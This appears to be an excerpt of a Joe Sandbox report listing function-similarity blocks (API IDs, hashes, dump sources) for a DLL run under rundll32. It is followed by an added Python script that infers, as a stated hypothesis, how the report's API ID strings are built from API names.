              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: CountCriticalInitializeSectionSpinmydllmain
              • String ID: InitializeCriticalSectionEx
              • API String ID: 3077948437-3084827643
              • Opcode ID: c37533a60aea342b14aa58079f67d55610bf7ee06076d1c7079a28a23d2ba90f
              • Instruction ID: ebf86ec77776e403c7eab09ca27d9bd56e07b3ccbeb410d9829cd61b024731fc
              • Opcode Fuzzy Hash: c37533a60aea342b14aa58079f67d55610bf7ee06076d1c7079a28a23d2ba90f
              • Instruction Fuzzy Hash: F0E09231442519B7CF221F60DC04D9D3F26DF80779F008012FA2C552D0C732D8619BD0
              APIs
              • mydllmain.DLL1(?,00000001,6F9E60D4,00000001,?,6F9EC1F7,?,?,?,?,?,00000000,6F9EAAAA,?,00000000,00000001), ref: 6F9EFD1C
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: mydllmain
              • String ID: FlsSetValue$ccs
              • API String ID: 979097349-2990521015
              • Opcode ID: 60e5aac3eda4c1bb2c9dc37df7179b4ab5dfff16b2bc96bc2c1489be20f95b11
              • Instruction ID: 2df782de406a8d0de655af6ac295f089cd7ee8a57e0e35dfae345fec7d5435b3
              • Opcode Fuzzy Hash: 60e5aac3eda4c1bb2c9dc37df7179b4ab5dfff16b2bc96bc2c1489be20f95b11
              • Instruction Fuzzy Hash: 93E0CD3254252973DA212F91AC08DD97F29DBC06B9B048063FF18962D0DA31D861D7D1
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: Allocmydllmain
              • String ID: FlsAlloc
              • API String ID: 2444374858-671089009
              • Opcode ID: 5d62a881fa14e11daa6522b692d7289d625f78807a1c4edb83c72af99d191f4f
              • Instruction ID: a7bd659a1ef523b56b66f01a8083a3fbed3ef9ff4d840c06664dea7a40f12a26
              • Opcode Fuzzy Hash: 5d62a881fa14e11daa6522b692d7289d625f78807a1c4edb83c72af99d191f4f
              • Instruction Fuzzy Hash: FBE0C23198692573CA322F54BD0899A7E19CFE1BBDB054023FF14953C19A20D81297E1
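              Every Similarity section above carries an "API ID" that Joe Sandbox uses to match this function against functions in other samples, but the report never states how that string is built from the API list. The script below is an added example, not Joe Sandbox code, and the rule it implements is an inference from the blocks on this page rather than a documented algorithm: split each API name into CamelCase words, drop words of three characters or fewer (Get, Set, Ex, W, CP, Fls, And, To, and the bare "___" prefix of ___AdjustPointer), count a word once per listed call including "Part of subcall function" entries, emit the most frequent words first with "$" between frequency groups, and sort bytewise inside a group (which is why mydllmain trails every capitalised word and Unothrow_t@std@@@ precedes __ehfuncinfo$??2@). The sample table is constructed from this page's own summaries. The numeric "API String ID" is a hash whose algorithm the page does not expose and is not reproduced here.

```python
import re
from collections import Counter

# Split a CamelCase API name into words. A run with no uppercase letter
# (a leading "___vcrt_", a lowercase export such as mydllmain) stays one word.
_WORD = re.compile(r"[A-Z][^A-Z]*|[^A-Z]+")


def tokenize(api_name: str) -> list[str]:
    """Words longer than three characters survive; Get/Set/Ex/W/CP/Fls/And/To/___ are dropped.
    (Inferred rule: every API ID on this page is consistent with it.)"""
    return [w for w in _WORD.findall(api_name) if len(w) > 3]


def api_id(api_calls: list[str]) -> str:
    """Rebuild the Similarity 'API ID' from a function's listed API calls (inferred rule)."""
    counts = Counter(w for name in api_calls for w in tokenize(name))
    groups: dict[int, list[str]] = {}
    for word, n in counts.items():
        groups.setdefault(n, []).append(word)
    # Most frequent words first; groups joined with "$"; bytewise sort inside a group,
    # so uppercase words precede "_"-prefixed ones, which precede lowercase ones.
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


# Constructed from the function summaries on this page: (listed API calls, API ID shown).
PAGE_SAMPLES = [
    (["GetLastError", "___vcrt_FlsGetValue", "___vcrt_FlsSetValue", "SetLastError"],
     "ErrorLastValue___vcrt_"),
    (["__alloca_probe_16", "__alloca_probe_16", "__freea", "HeapAlloc", "__freea", "__freea"],
     "__freea$__alloca_probe_16$AllocHeap"),
    (["mydllmain", "___AdjustPointer", "___AdjustPointer", "___AdjustPointer"],
     "AdjustPointer$mydllmain"),
    (["__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z"] * 3,
     "Unothrow_t@std@@@__ehfuncinfo$??2@"),
    (["LoadLibraryExW", "GetLastError", "LoadLibraryExW"], "LibraryLoad$ErrorLast"),
    (["GetConsoleOutputCP", "WideCharToMultiByte", "WriteFile", "WriteFile", "GetLastError"],
     "FileWrite$ByteCharConsoleErrorLastMultiOutputWide"),
    (["DecodePointer", "mydllmain", "mydllmain"], "mydllmain$DecodePointer"),
    (["WideCharToMultiByte", "GetLastError", "__dosmaperr", "GetLastError", "__dosmaperr"],
     "ErrorLast__dosmaperr$ByteCharMultiWide"),
    (["GetEnvironmentStringsW", "WideCharToMultiByte", "FreeEnvironmentStringsW",
      "FreeEnvironmentStringsW"], "EnvironmentStrings$Free$ByteCharMultiWide"),
    (["WriteConsoleW", "GetLastError", "CloseHandle", "___initconout", "CreateFileW",
      "WriteConsoleW"], "ConsoleWrite$CloseCreateErrorFileHandleLast___initconout"),
    (["EncodePointer"], "EncodePointer"),
    (["mydllmain", "InitializeCriticalSectionAndSpinCount"],
     "CountCriticalInitializeSectionSpinmydllmain"),
]


def check_page_samples() -> list[tuple[str, str]]:
    """Return (expected, computed) for every page sample the rule fails on; empty means all match."""
    return [(want, api_id(calls)) for calls, want in PAGE_SAMPLES if api_id(calls) != want]


if __name__ == "__main__":
    for calls, want in PAGE_SAMPLES:
        print(("ok  " if api_id(calls) == want else "BAD ") + want)
```

              Run it as a script to see one ok/BAD line per block, or call check_page_samples() from a notebook. The same rule also yields Allocmydllmain for FlsAlloc plus mydllmain, the API ID of the last block above whose API list did not survive extraction, so it is a useful sanity check when a report's API section is missing or when comparing hand-written API lists against IDs from another report. Treat it as a working hypothesis: it matches every summary on this page, but it is not Joe Sandbox's documented behaviour and a block elsewhere could still break it.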